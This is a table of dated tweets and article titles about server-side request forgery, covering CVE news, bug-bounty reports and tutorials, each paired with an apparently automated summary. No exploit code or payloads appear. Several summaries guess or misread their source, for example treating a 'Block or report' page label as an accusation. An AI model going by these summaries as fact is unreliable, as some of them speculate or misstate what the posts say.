| 748 | 2024-08-24 01:33:29 UTC | @CONSEJOSIAC: Un error de SSRF en Microsoft #Copilot Studio permitió a los investigadores acceder a información sensible en la nube. La ciberseguridad nunca fue tan crucial! #Ciberseguridad #SSRF | A SSRF error in Microsoft #Copilot Studio allowed researchers to access sensitive cloud information, highlighting the critical importance of cybersecurity. #Cybersecurity #SSRF. |
| 749 | 2024-08-23 16:13:58 UTC | @Horizon3ai: From @Horizon3Attack: Multiple new #SSRF vulnerabilities leading to NTLMv2 hash disclosure in three of the most popular #Python frameworks out there: Gradio by Hugging Face Jupyter Server and Streamlit from Snowflake. Get all of the details on these CVEs at | Multiple new SSRF vulnerabilities have been discovered in popular Python frameworks Gradio by Hugging Face, Jupyter Server, and Streamlit from Snowflake, leading to NTLMv2 hash disclosure. Details on these CVEs are available at the provided link. |
| 750 | 2024-08-22 21:48:54 UTC | veronicabp_: Rastreada por #Microsoft como CVE-2024-38206 la vulnerabilidad permite a un atacante autenticado eludir la protección #SSRF en Microsoft Copilot Studio para filtrar información sensible basada en la nube | The tweet by veronicabp_ discusses a vulnerability tracked by Microsoft as CVE-2024-38206. This flaw allows an authenticated attacker to bypass SSRF protection in Microsoft Copilot Studio, enabling them to extract sensitive cloud-based information. The vulnerability poses a risk to the security of the affected software. |
| 751 | 2024-08-22 11:43:49 UTC | @killmongar1996: Exciting News: New Blog Post Alert! Im thrilled to announce the release of my latest article Finding SSRF by Full Automation! Dive in here: #SSRF #Automation #InfoSec #Security #BugBounty #PenTesting #EthicalHacking #Vulnerability | @killmongar1996 announced a new blog post titled "Finding SSRF by Full Automation" focusing on cybersecurity topics like SSRF, automation, InfoSec, bug bounty, pen testing, ethical hacking, and vulnerability. The post aims to provide insights and strategies related to these areas. Interested readers can access the full article through the provided link. |
| 752 | 2024-08-22 09:51:18 UTC | Microsoft Copilot Studio Vulnerability Exploited to Access Sensitive Information | A vulnerability in Microsoft Copilot Studio was exploited to access sensitive information. The exploit allowed unauthorized access to confidential data, posing a security risk. Microsoft Copilot Studio users should be vigilant and take necessary precautions to protect their sensitive information from potential breaches. |
| 753 | 2024-08-22 07:43:49 UTC | lsobiraj: Microsoft Copilot Studio: Datenleck durch SSRF-Schwachstelle möglich #Datenschutz #ITSicherheit #CopilotStudio #CVE202438206 #Microsoft #Sicherheitslücke #SSRF #SSRFSchwachstelle | Microsoft Copilot Studio is vulnerable to a data leak due to a Server-Side Request Forgery (SSRF) weakness. This poses a risk to data privacy and IT security. The vulnerability is identified as CVE-202438206. The issue highlights a security flaw in Copilot Studio, potentially exposing sensitive information. The tweet by lsobiraj raises awareness about this SSRF vulnerability in Microsoft's Copilot Studio, emphasizing the importance of addressing such security gaps promptly. |
| 754 | 2024-08-22 07:43:48 UTC | tarnkappe_info: Microsoft Copilot Studio: Datenleck durch SSRF-Schwachstelle möglich #Datenschutz #ITSicherheit #CopilotStudio #CVE202438206 #Microsoft #Sicherheitslücke #SSRF #SSRFSchwachstelle | The content discusses a potential data leak in Microsoft Copilot Studio due to a Server-Side Request Forgery (SSRF) vulnerability. This vulnerability could lead to unauthorized access to sensitive information. The post highlights the importance of data protection and IT security in addressing this issue. The specific Common Vulnerabilities and Exposures (CVE) identifier for this vulnerability is mentioned as CVE-202438206. The tweet from tarnkappe_info provides further details on this security flaw. |
| 755 | 2024-08-22 05:43:26 UTC | @FindSecCyber: #Microsoft patched a critical SSRF flaw (CVE-2024-38206) in Copilot Studio protecting sensitive data. Secure your cloud now! How the Exploit Works: #CyberSecurity #CloudSecurity #SSRF #CopilotStudio #Canada #CanadaCyberAwareness | Microsoft has fixed a critical SSRF vulnerability (CVE-2024-38206) in Copilot Studio to safeguard sensitive data. The post emphasizes securing cloud environments. The exploit details are related to cybersecurity, cloud security, SSRF, Copilot Studio, and Canadian cyber awareness. The tweet encourages taking action to protect cloud systems. |
| 756 | 2024-08-22 02:43:32 UTC | manoj29191: Check out my latest article: Microsoft Patches Critical Copilot Studio Vulnerability Exposing Sensitive Data via @LinkedIn #Cybersecurity #Vulnerability #Microsoft #CVE202438206 #SSRF #InformationDisclosure #MicrosoftCopilot #SecurityFlaw | The content highlights an article by manoj29191 discussing Microsoft's patching of a critical Copilot Studio vulnerability that exposed sensitive data. The vulnerability, identified by CVE202438206, involved SSRF and information disclosure, posing a security flaw. The article emphasizes cybersecurity concerns and the importance of addressing vulnerabilities promptly. The link provided leads to the original post on Twitter for further details. |
| 757 | 2024-08-22 01:38:55 UTC | foxbook: 専門家がMicrosoft Copilot Studioの重大な情報漏洩の欠陥を公表 Experts disclosed a critical information-disclosure flaw in Microsoft Copilot Studio #SecurityAffairs (Aug 21) #セキュリティ脆弱性 #Microsoft #SSRF #情報漏洩 #クラウドセキュリティ | Experts revealed a serious information-disclosure flaw in Microsoft Copilot Studio, impacting security. The vulnerability was disclosed on August 21, highlighting concerns about security risks related to SSRF and cloud security. The flaw was shared on foxbook's Twitter account, emphasizing the importance of addressing such vulnerabilities promptly to safeguard data and systems. |
| 758 | 2024-08-21 22:21:52 UTC | Tenable research discovers critical vulnerability in Microsoft Copilot Studio - CRN | Tenable research has uncovered a critical vulnerability in Microsoft Copilot Studio, as reported by CRN. The vulnerability poses a significant risk to the security of the software. For more details, refer to the original source link provided. |
| 759 | 2024-08-21 16:26:52 UTC | Microsoft Copilot Studio Exploit Leaks Sensitive Cloud Data | The Microsoft Copilot Studio exploit has led to the leakage of sensitive cloud data. This incident raises concerns about the security of cloud services and the potential risks associated with such vulnerabilities. It highlights the importance of robust security measures to protect sensitive information stored in the cloud. |
| 760 | 2024-08-20 17:13:32 UTC | @Cyberwald_talks: #Microsoft #SSRF #CoPilot_Studio SSRFing the Web with the help of Copilot Studio | The content discusses SSRF (Server-Side Request Forgery) in the context of Microsoft's CoPilot Studio. It highlights how SSRF can be utilized with the assistance of Copilot Studio to manipulate requests sent from a server, potentially leading to security vulnerabilities. The link provided likely offers more details on this topic. |
| 761 | 2024-08-19 06:06:55 UTC | Critical Flaws In Microsoft's Azure Health Bot Service | The content discusses critical flaws found in Microsoft's Azure Health Bot Service. Specific details about the flaws or their impact are not provided in the summary. |
| 762 | 2024-08-18 07:48:56 UTC | akanbi_kunle: Happy Sunday Dive deep into SSRF & LFI vulnerabilities! Utilizing Wayback Machine & Waybackurls to expose secrets. Join forces & let's hunt! #BugBountyHunter #SSRF #LFI #Partner | The content shared by akanbi_kunle on Twitter encourages diving into SSRF & LFI vulnerabilities using tools like Wayback Machine & Waybackurls to uncover secrets. The post invites collaboration for hunting bugs and mentions relevant hashtags like #BugBountyHunter, #SSRF, #LFI, and #Partner. The focus is on exploring security vulnerabilities and working together to address them. |
| 763 | 2024-08-16 22:38:46 UTC | @PedramGholizade: اگه میخواید بدونید SSRF چیه و چطور توی axios این آسیبپذیری میتونسته باعث هک سایت بشه ویدیوی سینا رو ببینید حتما. خیلی ساده و روون توضیح داده و دمت گرم پسر بهت هم تسلیت میگم رفیق. #nodejs #axios #ssrf | The content discusses SSRF vulnerability in Axios, demonstrated in a video by @PedramGholizade. It explains what SSRF is and how it could be exploited to hack a website. The video provides a clear and simple explanation. The post also includes hashtags for Node.js, Axios, and SSRF. |
| 764 | 2024-08-16 05:28:49 UTC | Rajan22m: I completed the Web Security Academy lab: SSRF with blacklist-based input filter @WebSecAcademy #portswigger #websecurity #lab #hacking #ethicalhacker #ethicalhacking #bug #bugbountytips #ssrf #server | Rajan22m completed the Web Security Academy lab on SSRF with a blacklist-based input filter. The post includes hashtags related to web security, hacking, ethical hacking, bug bounty tips, SSRF, and servers. The completion of this lab likely signifies Rajan22m's progress and expertise in web security and ethical hacking. |
| 765 | 2024-08-15 12:28:18 UTC | @Sursanjha: Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to make requests from the server-side potentially leading to unauthorized actions or information disclosure. #SSRF #OWASP #SecurityResearch | The content highlights Server-Side Request Forgery (SSRF) as a web security vulnerability enabling attackers to make requests from the server-side, risking unauthorized actions or information disclosure. The tweet emphasizes the importance of understanding and addressing SSRF to enhance web security. It references OWASP and Security Research as relevant areas for further exploration. |
| 766 | 2024-08-15 06:23:41 UTC | @AbhijeetKumaw10: Day 12: Mastering Server SIde Request Forgery Vulnerability Uncover hidden SSRF Vulnerability flaws with advanced payloads and Defense bypass techniques. Check out the full blog here: #BugBounty #WebSecurity #30daychallenge #ssrf | The content discusses mastering Server-Side Request Forgery (SSRF) vulnerability, revealing hidden flaws using advanced payloads and defense bypass techniques. The author shares insights in a blog post as part of a 30-day challenge, focusing on Bug Bounty, Web Security, and SSRF. The tweet provides a link to the full blog post for further details. |
| 767 | 2024-08-14 20:56:42 UTC | Critical SAP Auth Bypass and SSRF Flaws Fixed Update Now | Critical authentication bypass and Server-Side Request Forgery (SSRF) vulnerabilities in SAP have been addressed. Users are advised to update their systems immediately to mitigate the risks associated with these flaws. It is crucial to apply the fixes promptly to prevent potential exploitation by malicious actors. |
| 768 | 2024-08-14 15:23:41 UTC | basu_banakar: Thread On: Testing for Blind/Non-Blind SSRFs using redirection in integrations where there are some filters. #bugbountytips #BugBounty #ssrf #bugbountytips 1. Hit the integration by using burp collaborator by using random credentials. | The content discusses testing for Blind/Non-Blind SSRFs using redirection in integrations with filters. The suggestion is to test by hitting the integration with Burp collaborator using random credentials. The post is shared on Twitter by basu_banakar. The focus is on bug bounty tips related to SSRF vulnerabilities. |
| 769 | 2024-08-14 15:23:41 UTC | it4chis3c: Day 12: Mastering Server SIde Request Forgery Vulnerability Uncover hidden SSRF Vulnerability flaws with advanced payloads and Defense bypass techniques. Check out the full blog here: #BugBounty #WebSecurity #30daychallenge #ssrf | The content discusses mastering Server-Side Request Forgery (SSRF) vulnerability, revealing hidden flaws using advanced payloads and defense bypass techniques. The blog provides insights into uncovering SSRF vulnerabilities. It is part of a 30-day challenge on Bug Bounty and Web Security. The full blog can be accessed through the provided link. |
| 770 | 2024-08-14 12:28:49 UTC | Checkmarx: #CVE-2024-39338: Axios critical vulnerability alert! Versions 1.3.2 up to 1.7.3 allow Server-Side Request Forgery via URL manipulation. SSRF could lead to internal system access or data exfiltration. #SSRF #AppSec | The content warns about a critical vulnerability in Axios versions 1.3.2 to 1.7.3, allowing Server-Side Request Forgery (SSRF) through URL manipulation. This SSRF exploit could result in unauthorized access to internal systems or data theft. Checkmarx issued a CVE alert for this vulnerability, emphasizing the importance of addressing it promptly to prevent potential security breaches. #SSRF #AppSec. |
| 771 | 2024-08-14 11:28:40 UTC | SOEhistory: August 14/15 1942: A waterborne raid by SOE's Small Scale Raiding Force (No. 62 Commando) led by Major Gus March-Phillipps destroys a German radar installation & nearby Flak sites. #GusMarchPhillipps #OperationBarricade #SSRF #62Commando #SOE #WW2 | On August 14/15, 1942, SOE's Small Scale Raiding Force (No. 62 Commando) led by Major Gus March-Phillipps conducted a successful waterborne raid, destroying a German radar installation and nearby Flak sites. This operation was known as Operation Barricade and was a significant event during World War II. The raid was a part of the activities of the Special Operations Executive (SOE) and showcased the bravery and effectiveness of the commandos involved. |
| 772 | 2024-08-14 08:56:45 UTC | Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services | A critical Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure allows hackers to compromise Health Bot Services. This vulnerability poses a significant security risk as it enables unauthorized access and manipulation of sensitive data within the Health Bot Services platform. It highlights the importance of addressing and patching such vulnerabilities promptly to prevent potential breaches and protect user information. |
| 773 | 2024-08-09 20:23:46 UTC | @lu3ky13: learn everything about SSRF OPEN REDIRECT and #Subdomain #Takeover Server-Side Request Forgery (#SSRF) What is a Subdomain Takeover? What is open redirects Insecure Direct Object References (#IDOR) #bugbountytip #BugBounty | The content discusses Server-Side Request Forgery (SSRF), Open Redirect, Subdomain Takeover, and Insecure Direct Object References (IDOR) in the context of bug bounty programs. It provides information on what SSRF, Subdomain Takeover, and Open Redirect vulnerabilities are, along with tips for bug bounty hunters. The content is shared on Twitter by the user @lu3ky13. |
| 774 | 2024-08-09 11:18:35 UTC | @nader_brandi: SSRF Techniques: Scenarios #SSRF #ServerSideRequestForgery #WebSecurity #AdvancedHacking #EthicalHacking #CyberSecurity #VulnerabilityResearch #SecurityTesting #AppSec #PenTesting #ExploitDev #NetworkSecurity #InfoSec #BugBountyTips #VulnDiscovery #BugBounty | The content shared by @nader_brandi on Twitter discusses SSRF (Server-Side Request Forgery) techniques through various scenarios. The post covers topics related to web security, ethical hacking, cyber security, vulnerability research, security testing, application security, penetration testing, exploit development, network security, information security, bug bounty tips, vulnerability discovery, and bug bounty programs. The tweet provides a link for further details. |
| 775 | 2024-08-09 09:41:10 UTC | Listen to the whispers: web timing attacks that actually work | The content discusses web timing attacks that are effective and practical. It emphasizes the importance of paying attention to subtle cues and signals in web timing attacks. These attacks can exploit timing vulnerabilities in web applications to gather sensitive information. By listening to these subtle timing differences, attackers can successfully carry out these attacks. The content highlights the significance of understanding and mitigating these types of attacks to enhance web application security. |
| 776 | 2024-08-06 04:58:32 UTC | @thezigzag3: #Bitdefender #Vulnerability #Let #Attackers #Trigger #SSRF #attacks | The tweet by @thezigzag3 highlights a vulnerability in Bitdefender that allows attackers to trigger Server-Side Request Forgery (SSRF) attacks. This vulnerability could potentially be exploited by malicious actors to manipulate server requests and access sensitive information. It is crucial for users of Bitdefender to be aware of this issue and take necessary precautions to protect their systems from such attacks. |
| 777 | 2024-08-05 17:58:42 UTC | Mhoseintaghrir: #SSRF for a single nondisplaced rib fracture | The content mentions a Twitter post by user Mhoseintaghrir discussing #SSRF for a single nondisplaced rib fracture. The post likely provides information or insights related to managing this specific type of rib fracture. It suggests that the user may be sharing knowledge or experiences regarding the treatment or care of such injuries. For more details, the original Twitter post should be referred to. |
| 778 | 2024-08-05 14:53:26 UTC | @coderadipv: Just published a new blog on Medium about Server-Side Request Forgery (SSRF) vulnerabilities! Dive in to learn how SSRF works and ways to protect against it. Check it out! #CyberSecurity #SSRF #Medium #infosecurity #blogging | @coderadipv shared a new blog on Medium about Server-Side Request Forgery (SSRF) vulnerabilities. The post explains how SSRF works and offers tips on protecting against it. The focus is on cybersecurity, SSRF, and information security. The tweet includes a link to the Medium blog post for those interested in learning more. |
| 779 | 2024-08-05 14:53:25 UTC | @coderadipv: Just completed the SSRF room on @RealTryHackMe ! Learning about Server-Side Request Forgery was super insightful. #cybersecurity #TryHackMe #SSRF #learning #infosec | @coderadipv completed the SSRF room on @RealTryHackMe, finding Server-Side Request Forgery insights valuable for cybersecurity. The tweet highlights learning experiences in the cybersecurity field. #SSRF #cybersecurity #TryHackMe #infosec |
| 780 | 2024-08-03 00:05:33 UTC | Icare hunter profile - YesWeHack | The content is a brief mention of an "Icare hunter profile" on the YesWeHack platform. It lacks specific details or information about the profile or the individual named Icare. |
| 781 | 2023-12-20 04:03:21 UTC | XSSRF : The Matrimony of XSS and SSRF. | The content discusses the concept of XSSRF, which is a combination of Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF). This fusion poses a significant security threat as it allows attackers to manipulate client-side scripts to make unauthorized requests to the server. By exploiting vulnerabilities in web applications, attackers can bypass security measures and potentially gain access to sensitive information or perform malicious actions. It is crucial for developers to be aware of XSSRF attacks and implement proper security measures to prevent such exploits. |
| 782 | 2023-11-14 04:24:58 UTC | Breaking Down SSRF on PDF Generation: A Pentesting Guide | The content discusses SSRF (Server-Side Request Forgery) vulnerabilities in PDF generation, providing a pentesting guide. It likely delves into how SSRF can be exploited during PDF creation processes, highlighting potential security risks and offering insights on how to test for and mitigate these vulnerabilities. The guide may include techniques for identifying and exploiting SSRF issues, as well as recommendations for securing PDF generation processes against such attacks. Overall, it aims to educate readers on the importance of addressing SSRF vulnerabilities in PDF generation to enhance cybersecurity measures. |
| 783 | 2023-11-08 02:18:44 UTC | JavaScript is not available. | The content indicates that JavaScript is not available. It includes a Twitter link that seems to be inaccessible due to JavaScript being disabled. This limitation may prevent the proper functioning of interactive elements on the webpage, impacting user experience and functionality. |
| 784 | 2023-11-07 21:20:02 UTC | 11.2 Lab: Exploiting XXE to perform SSRF attacks | 2023 | The content discusses a lab session focused on exploiting XML External Entity (XXE) vulnerabilities to conduct Server-Side Request Forgery (SSRF) attacks. This practical exercise likely involves demonstrating how attackers can manipulate XML input to access internal resources and potentially launch SSRF attacks. The lab aims to provide hands-on experience in understanding and mitigating these security risks. Participants will likely gain insights into the exploitation of XXE vulnerabilities and the associated SSRF attack vectors. The session may offer valuable insights into securing applications against such threats. |
| 785 | 2023-11-07 14:58:01 UTC | Testing for SSRF with Burp Suite | The content discusses testing for Server-Side Request Forgery (SSRF) using Burp Suite, a popular web vulnerability scanner. SSRF is a security vulnerability that allows attackers to send crafted requests from the server, potentially leading to unauthorized access or data leakage. Burp Suite can be used to detect and mitigate SSRF vulnerabilities by intercepting and analyzing requests, identifying potentially malicious URLs, and testing the server's response to different inputs. This process helps security professionals identify and address SSRF vulnerabilities in web applications to enhance their security posture. |
| 786 | 2023-11-01 03:24:00 UTC | What are SSRF Attacks and How They Work to Disrupting Email Security | SSRF attacks, or Server-Side Request Forgery, exploit vulnerabilities to manipulate servers into making unauthorized requests. Attackers can abuse SSRF to disrupt email security by tricking servers into sending malicious emails or accessing sensitive information. By exploiting SSRF vulnerabilities, attackers can bypass security measures and potentially compromise email systems. It is crucial for organizations to be aware of SSRF attacks and implement robust security measures to prevent unauthorized access and protect sensitive data. |
| 787 | 2023-11-01 03:23:58 UTC | Latest server-side request forgery (SSRF) news | The content is about the latest news related to server-side request forgery (SSRF). It appears to be a link to more detailed information on this topic, possibly discussing recent developments, trends, or incidents related to SSRF. The content seems to provide updates or insights on SSRF issues, but without further details, it is unclear what specific information is being shared. |
| 788 | 2023-10-31 16:24:06 UTC | JavaScript is not available. | The content states that JavaScript is not available, accompanied by a link to a tweet. The tweet seems to be inaccessible due to the lack of JavaScript. |
| 789 | 2023-10-07 21:59:28 UTC | Exploiting Non-Cloud SSRF for More Fun & Profit | The content discusses exploiting Server-Side Request Forgery (SSRF) vulnerabilities outside of cloud environments for increased enjoyment and financial gain. It likely delves into techniques, strategies, and potential risks associated with leveraging SSRF vulnerabilities in non-cloud settings. The focus seems to be on exploring the possibilities and implications of SSRF exploitation beyond traditional cloud platforms. |
| 790 | 2023-04-01 04:22:23 UTC | Fun with SSRF - Turning the Kubernetes API Server into a port scanner | The content discusses the exploitation of Server-Side Request Forgery (SSRF) to turn the Kubernetes API Server into a port scanner. By leveraging SSRF vulnerabilities, attackers can manipulate the Kubernetes API Server to scan ports on other systems. This misuse of SSRF highlights the importance of securing APIs and preventing unauthorized access to sensitive resources. |
| 791 | 2023-02-24 04:38:14 UTC | Block or report hackerscrolls | The content suggests taking action against a user named "hackerscrolls" by either blocking or reporting them. The link provided seems to direct to a specific action related to this user. It implies that the user may be engaging in hacking activities or behavior that is deemed inappropriate or harmful. The content advises taking steps to prevent further interaction or to report the user for violating platform guidelines. |
| 792 | 2023-02-24 04:33:21 UTC | /home/six2dez/.pentest-book | The content mentions a file path "/home/six2dez/.pentest-book" and a URL link "https://ift.tt/jCZboYB". It appears to be related to a pentest book or resource. The file path suggests a location on a system while the URL may lead to additional information or content. It seems to be a reference to a specific file or resource related to penetration testing. |
| 793 | 2023-02-24 04:33:19 UTC | Ssrf | The content provided is a link to a webpage related to SSRF (Server-Side Request Forgery), a type of web vulnerability where an attacker can manipulate a web application to make unauthorized requests on behalf of the server. SSRF can be exploited to access internal systems, perform port scanning, or launch attacks on other servers. It is crucial for developers to be aware of SSRF risks and implement security measures to prevent such attacks. |
| 794 | 2023-02-17 12:53:38 UTC | https://hacklido.com/blog/294-ssrf-that-allowed-us-to-access-whole-infra-web-services-and-many-more | The content discusses a Server-Side Request Forgery (SSRF) vulnerability that allowed unauthorized access to an organization's entire infrastructure, web services, and more. The vulnerability was exploited to gain access to sensitive information and potentially compromise the security of the organization. It highlights the importance of identifying and addressing SSRF vulnerabilities to prevent unauthorized access and protect sensitive data. |
| 795 | 2023-02-15 04:23:30 UTC | SSRFIRE | The content mentions "SSRFIRE" and provides a link: https://ift.tt/Rc7m3TD. The term "SSRFIRE" is not explained in the content, and the link appears to be a shortened URL. It is unclear what the content is about or what information is being shared. |
| 796 | 2023-02-14 04:58:25 UTC | Web ApplicationApril 7 2022Server-Side Request Forgery (SSRF) | The content discusses Server-Side Request Forgery (SSRF) in web applications, dated April 7, 2022. It appears to be a link to further information on SSRF. |
| 797 | 2023-02-14 04:48:44 UTC | Server-Side Request Forgery (SSRF) Attacks: The Ultimate Guide | The content discusses Server-Side Request Forgery (SSRF) attacks, providing a comprehensive guide on this cybersecurity threat. SSRF attacks involve manipulating a server to make unintended requests, potentially leading to data breaches or server exploitation. The guide likely covers how SSRF attacks work, common vulnerabilities, prevention measures, and mitigation strategies to protect against such attacks. It aims to educate readers on understanding, detecting, and defending against SSRF attacks to enhance cybersecurity defenses. |
| 798 | 2023-02-14 04:48:43 UTC | How To: Server-Side Request Forgery (SSRF) | The content discusses Server-Side Request Forgery (SSRF) and provides a guide on how to perform it. SSRF is a vulnerability that allows attackers to make requests from a server, potentially accessing sensitive information or executing malicious actions. The guide likely includes techniques and examples of exploiting SSRF vulnerabilities. It is crucial for developers and security professionals to understand SSRF to prevent and mitigate such attacks. |
| 799 | 2023-02-14 04:48:41 UTC | Beginner Guide To Exploit Server Side Request Forgery (SSRF) Vulnerability | The content is a beginner's guide on exploiting Server Side Request Forgery (SSRF) vulnerabilities. SSRF is a type of security vulnerability that allows an attacker to make requests on behalf of the server. The guide likely covers the basics of SSRF, how to identify and exploit these vulnerabilities, and potentially includes tips on prevention and mitigation strategies. It aims to educate readers on understanding and exploiting SSRF vulnerabilities for security testing and awareness purposes. |
| 800 | 2023-01-29 15:19:24 UTC | SSRFire - an automated SSRF finder | SSRFire is an automated tool designed for finding Server-Side Request Forgery (SSRF) vulnerabilities. It helps identify potential security weaknesses in web applications that could be exploited by attackers. By automating the process of detecting SSRF flaws, SSRFire aims to enhance the security of web applications and prevent unauthorized access to sensitive data or resources. The tool can be a valuable asset for security professionals and developers looking to proactively address SSRF vulnerabilities in their applications. |
| 801 | 2023-01-29 15:09:28 UTC | SSRF and Open Redirect CheatSheet | The content is a cheat sheet on Server-Side Request Forgery (SSRF) and Open Redirect vulnerabilities. It likely provides information, tips, and examples related to these security risks. SSRF involves manipulating a server to make unintended requests, while Open Redirect allows attackers to redirect users to malicious websites. The cheat sheet may offer guidance on how to identify, prevent, and mitigate these vulnerabilities in web applications. |
| 802 | 2023-01-23 02:42:48 UTC | Server-Side Request Forgery (SSRF) | Common Attacks & Risks | Imperva | SSRF, or Server-Side Request Forgery, is a prevalent web application attack that impacts both public-facing and internal servers. This type of attack poses significant risks to web applications. |
| 803 | 2023-01-23 02:42:19 UTC | What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security Academy | The content discusses SSRF (Server-side request forgery), explaining its definition, common examples, and methods to identify and exploit different types of SSRF vulnerabilities. It aims to provide a tutorial on understanding and addressing SSRF risks in web security. |
| 804 | 2022-10-13 02:44:05 UTC | Hey man if I talk about the impact it is comparatively low than that of normal ssrf because of its | The content discusses the impact of a specific type of vulnerability called Server-Side Request Forgery (SSRF), noting that its impact is relatively low compared to a typical SSRF. The post seems to imply that this particular SSRF vulnerability may have less severe consequences than others. |
| 805 | 2022-10-13 02:44:04 UTC | Server-Side Request Forgery (SSRF)- PortSwigger Labs | The content discusses Server-Side Request Forgery (SSRF) as presented by PortSwigger Labs. SSRF is a vulnerability that allows attackers to manipulate a server into making requests on their behalf. This can lead to unauthorized access to internal systems, data theft, or server exploitation. Understanding SSRF is crucial for developers and security professionals to prevent such attacks and secure their systems. The link provided likely offers further details or resources on SSRF from PortSwigger Labs. |
| 806 | 2022-10-13 02:44:00 UTC | Lets Understand SSRF vulnerability | The content discusses the SSRF (Server-Side Request Forgery) vulnerability, which is a type of security issue where an attacker can manipulate a web application to make unauthorized requests on behalf of the server. SSRF can lead to data breaches, server exploitation, and even full system compromise. Understanding SSRF vulnerabilities is crucial for developers and security professionals to prevent such attacks and protect sensitive data. It is important to implement proper security measures and validate user input to mitigate the risks associated with SSRF vulnerabilities. |
| 807 | 2022-10-13 02:43:56 UTC | Exploiting XXE for SSRF | The content discusses exploiting XML External Entity (XXE) vulnerabilities to achieve Server-Side Request Forgery (SSRF) attacks. By manipulating XML input, attackers can trigger the server to make unintended requests to internal resources, potentially leading to data leakage or unauthorized access. This technique leverages the server's ability to parse XML data and can be used to bypass security measures. Understanding and mitigating XXE vulnerabilities is crucial to prevent SSRF attacks and protect sensitive information. |
| 808 | 2022-10-13 02:43:54 UTC | Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports | The content discusses the top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports. It likely highlights significant instances where SSRF vulnerabilities were discovered and reported through bug bounty programs. SSRF is a type of security vulnerability that allows attackers to manipulate server requests, potentially leading to unauthorized access or data leakage. The bug bounty reports likely showcase the impact and severity of SSRF vulnerabilities in various systems and emphasize the importance of addressing such issues to enhance cybersecurity. |
| 809 | 2022-10-13 02:43:48 UTC | AWS internal metadata accessed through SSRF by Chaining an Open Redirect bug | The content discusses a security vulnerability where AWS internal metadata was accessed through Server-Side Request Forgery (SSRF) by exploiting an Open Redirect bug. This vulnerability allowed unauthorized access to sensitive AWS information. The method involved chaining the SSRF vulnerability with the Open Redirect bug to gain access to internal metadata. This highlights the importance of addressing and fixing such vulnerabilities to prevent unauthorized access to critical information stored on AWS servers. |
| 810 | 2022-10-13 02:43:47 UTC | SSRF payloads | The content mentions SSRF payloads, which are used in exploiting Server-Side Request Forgery vulnerabilities. These payloads can be utilized to manipulate servers into making requests to unintended destinations, potentially leading to data breaches or unauthorized access. It is crucial for developers to be aware of SSRF vulnerabilities and implement proper security measures to prevent such attacks. |
| 811 | 2022-10-13 02:43:43 UTC | Escalating SSRF to Accessing all user PII information by aws metadata | The content discusses a security vulnerability known as Server-Side Request Forgery (SSRF) being exploited to access all user Personally Identifiable Information (PII) through AWS metadata. This escalation highlights the potential risks associated with SSRF attacks and the importance of securing AWS configurations to prevent unauthorized access to sensitive data. The content likely provides insights on how attackers can leverage SSRF vulnerabilities to gain access to valuable information stored within AWS environments, emphasizing the need for robust security measures to protect against such threats. |
| 812 | 2022-10-13 02:43:41 UTC | Blind SSRF - The Hide & Seek Game | The content discusses Blind Server-Side Request Forgery (SSRF) attacks, where attackers manipulate a server into making requests on their behalf without the server's knowledge. This technique can be used to access sensitive information or exploit vulnerabilities. The article likely delves into the challenges of detecting and preventing Blind SSRF attacks, highlighting the need for robust security measures to safeguard against this threat. |
| 813 | 2022-10-13 02:38:53 UTC | Chaining an Blind SSRF bug to Get an RCE | The content discusses the process of exploiting a Blind Server-Side Request Forgery (SSRF) vulnerability to achieve Remote Code Execution (RCE). By chaining these vulnerabilities, attackers can manipulate the server to execute arbitrary commands, potentially leading to unauthorized access and control over the system. This technique involves leveraging SSRF to interact with internal resources and ultimately escalate privileges to execute malicious code remotely. It highlights the importance of addressing and patching SSRF vulnerabilities to prevent such attacks and protect systems from exploitation. |
| 814 | 2022-10-13 02:38:46 UTC | How Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata access | The content discusses how utilizing Github reconnaissance techniques helped the author discover nine significant Server-Side Request Forgery (SSRF) vulnerabilities that provided access to AWS metadata. The vulnerabilities were likely identified through searching Github repositories for sensitive information or misconfigurations that could be exploited. The findings highlight the importance of conducting thorough security assessments and utilizing tools like Github recon to identify and address potential vulnerabilities in systems that could lead to unauthorized access or data breaches. |
| 815 | 2022-10-13 02:38:42 UTC | Intro to SSRF | The content is an introduction to Server-Side Request Forgery (SSRF) provided via a link. SSRF is a type of web vulnerability where an attacker can manipulate a server into making unintended requests on their behalf. This can lead to unauthorized access to internal systems, data leaks, or even server exploitation. Understanding SSRF is crucial for web security professionals to prevent such attacks and protect sensitive data. The link likely provides more in-depth information on SSRF and its implications for web security. |
| 816 | 2022-10-13 02:38:40 UTC | The journey of Web Cache Firewall Bypass to SSRF to AWS credentials compromise! | The content discusses a progression from bypassing web cache and firewalls to exploiting Server-Side Request Forgery (SSRF) vulnerabilities, ultimately leading to compromising AWS credentials. The journey highlights the potential security risks associated with these vulnerabilities and the importance of securing systems against such attacks. |
| 817 | 2022-10-13 02:38:37 UTC | Vimeo upload function SSRF | The content mentions a security vulnerability related to Vimeo's upload function known as Server-Side Request Forgery (SSRF). This vulnerability could potentially allow attackers to manipulate the server into making unauthorized requests on their behalf. It is important for Vimeo to address and patch this vulnerability to prevent potential exploitation by malicious actors. |
| 818 | 2022-10-13 02:38:37 UTC | Just Gopher It: Escalating a Blind SSRF to RCE for $15k | The content discusses escalating a blind Server-Side Request Forgery (SSRF) vulnerability to Remote Code Execution (RCE) for a reward of $15,000. The method used involves exploiting the SSRF vulnerability to access internal services, then leveraging it to execute code on the server. The process is detailed in the content, highlighting the steps taken to turn a lower-level security issue into a critical RCE vulnerability. The article likely provides insights into the technical aspects of the exploit, the challenges faced, and the rewards reaped for successfully escalating the vulnerability. |
| 819 | 2022-10-13 02:38:36 UTC | Bypassing SSRF Protection | The content discusses the topic of bypassing Server-Side Request Forgery (SSRF) protection measures. SSRF is a vulnerability that allows attackers to send crafted requests from a server, potentially leading to unauthorized access or data leakage. By bypassing SSRF protection, attackers can circumvent security controls and exploit vulnerabilities in web applications. The article likely provides insights, techniques, or examples of how attackers can evade SSRF protection mechanisms to carry out malicious activities. It emphasizes the importance of implementing robust security measures to prevent SSRF attacks and safeguard sensitive data. |
